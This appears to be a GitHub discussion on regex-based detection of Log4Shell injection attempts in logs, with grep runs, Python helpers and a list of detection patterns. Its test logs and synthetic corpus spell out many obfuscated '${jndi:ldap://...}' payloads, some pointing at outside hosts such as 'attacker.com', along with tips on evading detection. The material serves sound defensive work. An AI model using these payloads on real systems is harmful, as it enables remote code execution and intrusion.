Open back2root opened 2 years ago
That's really nice. Let me see if I can verify the regex and add it to the gist in which we use grep.
https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
I can't make it match on my log files with
sudo egrep -I -i -r '(?:\$|%24)(?:{|%7[Bb]).{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)).{0,30}(?::|%3[Aa])' /var/log
Maybe egrep is somehow limited, e.g. missing back-referencing.
Log line in one of the test files
2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
Not yet tested on egrep or the CLI in general. Since it should be valid PCRE, maybe a Perl one-liner can get us results. Maybe I can craft something later.
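One likely reason the egrep run above finds nothing: non-capturing groups written as (?:...) are Perl-style syntax and are not part of POSIX extended regular expressions, which is what egrep implements. As a quick sanity check with a Perl-style engine, this sketch feeds the same pattern and the test log line to Python's re module. Python's engine is not PCRE itself, so treat the result as an approximation rather than proof of what grep -P does.

```python
import re

# The pattern from the egrep command above, copied verbatim and only
# split across several raw-string literals for readability.
LOG4SHELL_RE = re.compile(
    r'(?:\$|%24)(?:{|%7[Bb])'
    r'.{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee])'
    r'.{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa])'
    r'.{0,30}(?:'
    r'(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?'
    r'|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)'
    r'|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)'
    r').{0,30}(?::|%3[Aa])'
)

# The log line from the test file quoted above.
TEST_LINE = '2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}'

if __name__ == '__main__':
    print('match' if LOG4SHELL_RE.search(TEST_LINE) else 'no match')
```

If this reports a match, the pattern itself is fine and the problem is the regex dialect egrep uses.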
Sorry, I'm working on 5-7 other construction sites (YARA, Sigma, Python script, advisory for customers). Thanks for your help.
Agreed that this is doable with a regex, but that’s also going to miss payloads (e.g. ${${base64:JHtqbmRpOmxkYXA6YWRkcn0=}}¹, ${jnd${upper:ı}:rm${upper:ı}://addr}). You probably just want something like https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6
¹ EDIT: Turns out the former won't work by default because base64 isn't actually in a release yet, just in master, but...imagine that someone added it as a custom lookup, or just consider any of the other available lookups.
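To make the two example payloads concrete, here is a small sketch of why a regex looking for the literal letters "jndi" cannot see them. NAIVE_RE is a deliberately simple stand-in I made up for illustration, not any of the regexes from this thread, and the "resolved" strings only imitate by hand what the lookups would produce.

```python
import base64
import re

# Hypothetical naive detector: literal "${jndi:" in any ASCII casing.
NAIVE_RE = re.compile(r'\$\{\s*[jJ][nN][dD][iI]\s*:')

encoded = '${${base64:JHtqbmRpOmxkYXA6YWRkcn0=}}'
dotless = '${jnd${upper:ı}:rm${upper:ı}://addr}'

# What the base64 lookup would yield if it were available on the target.
decoded = base64.b64decode('JHtqbmRpOmxkYXA6YWRkcn0=').decode('ascii')

# The dotless i (U+0131) upper-cases to a plain ASCII "I".
resolved = dotless.replace('${upper:ı}', 'ı'.upper())

if __name__ == '__main__':
    for label, text in [('encoded', encoded), ('decoded', decoded),
                        ('dotless', dotless), ('resolved', resolved)]:
        print(label, text, bool(NAIVE_RE.search(text)))
```

The raw payloads never contain the letters the regex is waiting for; they only appear after the target has evaluated the lookups.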
Hi
I just now managed to test the regex on the CLI.
The RegEx seems to work with grep -P against the test cases from this repo.
Current limitations:
➜ test-cases git:(main) ls | grep -E "log$"
test-java-exception.log
test-log-heavy-obfusc.log
test-log-log4shell-casing.log
test-log-log4shell-obf1.log
test-log-log4shell.log
test-shouldnt-match1.log
test-shouldnt-match2.log
test-url-encoded.log
test-urldecode-shouldnt-match.log
➜ test-cases git:(main) grep -V | head -n 1
grep (GNU grep) 3.4
➜ test-cases git:(main) grep -r -P '(?:\$|%24)(?:{|%7[Bb]).{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)).{0,30}(?::|%3[Aa])'
test-log-log4shell.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
test-log-log4shell-obf1.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://spfcbf${lower:.}dnslog${lower:.}cn}
test-url-encoded.log:2021-12-11 [MyApp] - Contains $%7Bjndi:ldap://tj5udg.dnslog.cn%7D
test-log-log4shell-casing.log:2021-12-11 [MyApp] - Contains ${jNdI:ldAp://tj5udg.dnslog.cn}
test-log-heavy-obfusc.log:2021-12-11 [MyApp] - Contains ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
Maybe I'll manage to work on a version covering the missing protocols: nis|iiop|corba|nds|http. If there's interest, I'm happy to share.
Yes, please. We can replace the regex in this advisory with your version if it is able to cover the old strings and their obfuscated version. https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
I wouldn't replace it as long as it can't detect the other protocols.
Since the RegEx has become a bit more complicated, I created a script that generates the RegEx and put it in its own repo log4shell-rex to make it easier to extend later.
Feel free to use it or reference it in your gist.
➜ log4shell-rex git:(main) eval "$(./RegEx_Generator.sh)"
_ _ _ ____ _ _ _ ____
| | ___ __ _| || |/ ___|| |__ ___| | | | _ \ _____ __
| | / _ \ / _` | || |\___ \| '_ \ / _ \ | |_____| |_) / _ \ \/ /
| |__| (_) | (_| |__ _|__) | | | | __/ | |_____| _ < __/> <
|_____\___/ \__, | |_||____/|_| |_|\___|_|_| |_| \_\___/_/\_\
|___/
➜ log4shell-rex git:(main) grep -P ${Log4ShellRex} ../log4shell-detector/tests/test-cases/*.log
../log4shell-detector/tests/test-cases/test-log-heavy-obfusc.log:2021-12-11 [MyApp] - Contains ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
../log4shell-detector/tests/test-cases/test-log-log4shell-casing.log:2021-12-11 [MyApp] - Contains ${jNdI:ldAp://tj5udg.dnslog.cn}
../log4shell-detector/tests/test-cases/test-log-log4shell-obf1.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://spfcbf${lower:.}dnslog${lower:.}cn}
../log4shell-detector/tests/test-cases/test-log-log4shell.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
../log4shell-detector/tests/test-cases/test-url-encoded.log:2021-12-11 [MyApp] - Contains $%7Bjndi:ldap://tj5udg.dnslog.cn%7D
../log4shell-detector/tests/test-cases/test-url-encoded.log:2021-12-11 [MyApp] - Contains %24%257Bjndi%3Aldap%3A%2F%2Ftj5udg%2Ednslog%2Ecn%257D
../log4shell-detector/tests/test-cases/test-url-encoded.log:2021-12-11 [MyApp] - Contains %2524%25257Bjndi%253Aldap%253A%252F%252Ftj5udg%252Ednslog%252Ecn%25257D
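The last two hits above are double and triple URL-encoded. As an alternative to encoding every layer into the regex, one could decode a line repeatedly until it stops changing and then run a simple pattern over the result. This is only a sketch of that idea, not what RegEx_Generator.sh does; fully_unquote and max_rounds are names I picked for illustration.

```python
from urllib.parse import unquote


def fully_unquote(text, max_rounds=5):
    """Percent-decode repeatedly until the text is stable.

    max_rounds is an arbitrary safety cap (an assumption of this sketch).
    """
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


if __name__ == '__main__':
    triple = ('%2524%25257Bjndi%253Aldap%253A%252F%252F'
              'tj5udg%252Ednslog%252Ecn%25257D')
    print(fully_unquote(triple))
```

Keep in mind that decoding can also turn harmless text into something that matches, so hits found this way probably deserve a lower priority than hits on the raw line.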
You might want to try against this synthetic corpus, which is also trying to model what sort of attacks might be coming (or that are already being missed):
\044%7B\\44{env:NOTHING:-j}\u0024{lower:N}\\u0024{lower:${upper:d}}}i:addr}
%24%7Bjnd%24%7Bupper%3A%C4%B1%7D%3Aaddr%7D
${ jndi\t: addr\n
${ jndi\t: addr\n}
${${::-j}nd${upper:ı}:rm${upper:ı}://addr}
${${base64:JHtqbmRpOmxkYXA6YWRkcn0=}}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//addr}
${base64:d2hvIHRob3VnaHQgYW55IG9mIHRoaXMgd2FzIGEgZ29vZCBpZGVhPwo=}
${jndi:${lower:l}${lower:d}a${lower:p}://$a{upper:d}dr}
${jndi:${lower:l}${lower:d}a${lower:p}://addr
${jndi:dns://addr}
$%7B\u006a\\156di:addr\\x7d
You can see how my detections fare, and run your own examples against the test(string) and test_thorough(string) functions.
I don’t think there’s going to be one regex to rule them all because there’s a signal-to-noise trade-off that needs to be considered. You’d ideally match on all of them and build a confidence score naïve Bayes style. But you want to encode as few assumptions into your detections as possible, otherwise you literally won’t know what you’re missing.
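A rough sketch of what "naïve Bayes style" scoring could look like: every detector contributes a log-likelihood ratio depending on whether it fired, and the sum is turned back into a probability. The three patterns are SIMPLE_RE, NESTED_RE and ANY_RE from the regex collection; every number (the prior and the per-detector hit rates) is invented for illustration and would have to be estimated from your own logs.

```python
import math
import re

# name -> (pattern, P(hit | malicious), P(hit | benign)).
# All probabilities below are made-up placeholders, not measurements.
DETECTORS = {
    'SIMPLE_RE': (re.compile(r'\$\{\s*jndi\s*:.*\}'), 0.60, 0.001),
    'NESTED_RE': (re.compile(r'\$\{.*\$\{.*\}.*\}'), 0.50, 0.01),
    'ANY_RE': (re.compile(r'\$\{.*\}'), 0.95, 0.10),
}
PRIOR = 0.01  # assumed share of malicious lines, also a placeholder


def log_odds(line):
    """Sum the prior log-odds and one likelihood ratio per detector."""
    score = math.log(PRIOR / (1 - PRIOR))
    for pattern, p_mal, p_ben in DETECTORS.values():
        if pattern.search(line):
            score += math.log(p_mal / p_ben)
        else:
            score += math.log((1 - p_mal) / (1 - p_ben))
    return score


def probability(line):
    """Convert the log-odds into a probability between 0 and 1."""
    return 1 / (1 + math.exp(-log_odds(line)))


if __name__ == '__main__':
    for line in ['${jndi:ldap://addr}', 'Total: ${amount}', 'plain line']:
        print(f'{probability(line):.4f}  {line}')
```

The "naïve" part is that the detectors are treated as independent, which these overlapping regexes clearly are not, so the output is better read as a ranking than as a calibrated probability.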
@karanlyons wondering if exploit is possible without any protocol given and without forward slash: e.g. ${ jndi\t: addr\n}
Not yet sure about false positive rate
https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup:
The JndiLookup allows variables to be retrieved via JNDI. By default the key will be prefixed with java:comp/env/, however if the key contains a ":" no prefix will be added. By default the JNDI Lookup only supports the java, ldap, and ldaps protocols or no protocol. Additional protocols may be supported by specifying them on the log4j2.allowedJndiProtocols property.
https://docs.oracle.com/javase/jndi/tutorial/beyond/misc/policy.html:
In the comp context, there are two bindings: env and UserTransaction. The name env is bound to a subtree that is reserved for the component's environment-related bindings, as defined by its deployment descriptor. env is short for environment.
Environment entries are a name-to-value binding that allows a component to externalize a value and refer to the value using a name.
So a contrived example would be, e.g., that there’s comp/env/pwd = "/" and you then use ${jndi:ldap${jndi:pwd}${jndi:pwd}addr} as your vector. I do not know whether this is practical anywhere or not, so I’d much rather have my detections tell me if someone else knows it’s practical rather than assume it isn’t and get popped.
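To illustrate the contrived example, here is a toy model of the prefix rule from the Log4j docs plus innermost-first substitution. It is not how Log4j is implemented: FAKE_JNDI stands in for a real JNDI context, and jndi_name and resolve are hypothetical helpers.

```python
import re

# Hypothetical JNDI environment holding the contrived binding from above.
FAKE_JNDI = {'java:comp/env/pwd': '/'}

# Matches only ${jndi:...} expressions with no further nesting inside.
INNERMOST_JNDI = re.compile(r'\$\{jndi:([^${}]*)\}')


def jndi_name(key):
    """Documented rule: keys without ':' get the java:comp/env/ prefix."""
    return key if ':' in key else 'java:comp/env/' + key


def resolve(text, max_rounds=10):
    """Replace innermost jndi lookups until nothing changes any more."""
    def substitute(match):
        value = FAKE_JNDI.get(jndi_name(match.group(1)))
        # Unknown names are left untouched in this toy model.
        return match.group(0) if value is None else value

    for _ in range(max_rounds):
        resolved = INNERMOST_JNDI.sub(substitute, text)
        if resolved == text:
            break
        text = resolved
    return text


if __name__ == '__main__':
    print(resolve('${jndi:ldap${jndi:pwd}${jndi:pwd}addr}'))
```

The slashes never appear in the logged string; they only show up once the inner lookups have been substituted, which is the kind of thing a regex on the raw input cannot anticipate.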
Also keep in mind that jndi is not the only lookup, and you can plausibly make use of others to construct payloads depending on what is available on the target, including any custom lookups the target may have. There’s even a base64 lookup referenced in the User’s Guide and though I’m not sure I’ve seen it working in the wild¹ it would handily break most detections I’ve seen.
Have you tried testing the detections I’ve linked above? You can get an idea of their sensitivities by throwing a corpus of known vectors and a corpus of theorized probable vectors at them. The usage.md file shows some example vectors and which detections they trigger. I’d really recommend just using them, and weighting your prioritization for any hits based on the confusion matrix you’re seeing for them with the data in your environment.
But your best plan of action is just to upgrade or mitigate (rm JndiLookup.class or log4j2.formatMsgNoLookups=true) your log4j dependencies, and practice good defense in depth (e.g., block all unknown egress, including DNS if you can handle running your own resolver safely, and jail everything on your machine). No detections on remote inputs are going to be able to find every attempt; it’s a cat-and-mouse game stacked heavily in the attacker’s favor.
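If you go the "rm JndiLookup.class" route, it helps to verify afterwards that the class is really gone. A minimal sketch, assuming a plain log4j-core jar in which the class sits at its usual path; has_jndi_lookup is a hypothetical helper, and jars nested inside other archives (fat jars, WARs) are not inspected.

```python
import zipfile

# Path of the class inside log4j-core, as used by the well-known mitigation.
JNDI_LOOKUP_CLASS = 'org/apache/logging/log4j/core/lookup/JndiLookup.class'


def has_jndi_lookup(jar_path):
    """Return True if the jar still contains JndiLookup.class."""
    with zipfile.ZipFile(jar_path) as jar:
        return JNDI_LOOKUP_CLASS in jar.namelist()


if __name__ == '__main__':
    import sys
    for path in sys.argv[1:]:
        status = 'still present' if has_jndi_lookup(path) else 'removed'
        print(f'{path}: JndiLookup.class {status}')
```

Run it with one or more jar paths as arguments.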
¹ EDIT: Again, because base64 isn't actually in a release yet, just in master, but, also again, imagine that someone added it as a custom lookup, or just consider any of the other available lookups.
Thanks @karanlyons. I made some improvements to my RegEx and already get quite good coverage. It's maybe still not enough to be used in an IPS, but it's a good starting point for SIEM detections.
I’d still recommend that people use the collection of regexes I’ve put together as they’re free of assumptions. For example:
>>> from log4shell_regexes import *
>>> t = lambda s: [k for k in test(s)]
>>> BACK2ROOT_RE = re.compile(r'[elided for comment]')
>>> BACK2ROOT_RE.search('${env:ZILCH:-jnd${lower:${upper:ı}}://addr}') or False
False
>>> t('${env:ZILCH:-jnd${lower:${upper:ı}}://addr}')
['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']
If you’re having trouble just getting the regexes for use elsewhere, this is very easy to do:
>>> from log4shell_regexes import regexes
>>> for n, r in regexes.items(): print (f'{n}: {r.pattern}')
SIMPLE_RE: \$\{\s*jndi\s*:.*\}
SIMPLE_WITH_ESCAPED_CONTENT_RE: \$\{.*(?:\\|%).*\}
NESTED_RE: \$\{.*\$\{.*\}.*\}
NESTED_INCLUDING_ESCAPES_RE: (?:(?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*){2}(?:\}|\\u007D|\\x7D|\\175|%7D).*(?:\}|\\u007D|\\x7D|\\175|%7D)
ANY_RE: \$\{.*\}
ANY_INCLUDING_ESCAPES_RE: (?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*(?:\}|\\u007D|\\x7D|\\175|%7D)
SIMPLE_OPT_RCURLY_RE: \$\{\s*jndi\s*:.*\}?
SIMPLE_WITH_ESCAPED_CONTENT_OPT_RCURLY_RE: \$\{.*(?:\\|%).*\}?
NESTED_OPT_RCURLY_RE: \$\{.*\$\{.*\}.*\}?
NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE: (?:(?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*){2}(?:\}|\\u007D|\\x7D|\\175|%7D).*(?:\}|\\u007D|\\x7D|\\175|%7D)?
ANY_OPT_RCURLY_RE: \$\{.*\}?
ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE: (?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*(?:\}|\\u007D|\\x7D|\\175|%7D)?
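To show what the _OPT_RCURLY variants add, here is a small sketch using two of the patterns printed above, copied as-is. The unterminated input is a made-up example of a payload whose closing brace was cut off, for instance by log truncation.

```python
import re

# Two patterns copied from the listing above.
SIMPLE_RE = re.compile(r'\$\{\s*jndi\s*:.*\}')
SIMPLE_OPT_RCURLY_RE = re.compile(r'\$\{\s*jndi\s*:.*\}?')

terminated = '${jndi:ldap://addr}'
unterminated = '${jndi:ldap://addr'  # hypothetical truncated payload

if __name__ == '__main__':
    for text in (terminated, unterminated):
        print(text,
              bool(SIMPLE_RE.search(text)),
              bool(SIMPLE_OPT_RCURLY_RE.search(text)))
```

The optional closing brace makes the pattern more sensitive but also noisier, which is why it helps to keep both variants and see which one fired.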
Updated my regex
The following RegEx is just the equivalent. I don't know whether it's still a reasonable regular expression, but it's doable:
It matches the following strings, even if they are (partially) URL-encoded and case-insensitive:
Example:
Improvement idea for the script: to reduce the chance of false positives and improve performance a bit, you could require that the '$' sign at the start is immediately followed by a '{'.
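A toy illustration of that idea. LOOSE_RE and STRICT_RE are simplified patterns invented for this comment, not the regex generated by the script; they only show how a gap between '$' and '{' lets unrelated text match.

```python
import re

# Hypothetical simplified patterns, for illustration only.
LOOSE_RE = re.compile(r'\$.{0,30}\{.{0,30}jndi')   # gap allowed after '$'
STRICT_RE = re.compile(r'\$\{.{0,30}jndi')         # '{' must follow '$'

benign = 'Price is $5 {see the jndi docs}'
attack = '${jndi:ldap://addr}'

if __name__ == '__main__':
    for text in (benign, attack):
        print(text, bool(LOOSE_RE.search(text)), bool(STRICT_RE.search(text)))
```

In a real pattern the brace would still need its encoded forms (e.g. %7B), so "immediately followed" should apply to those alternatives as well.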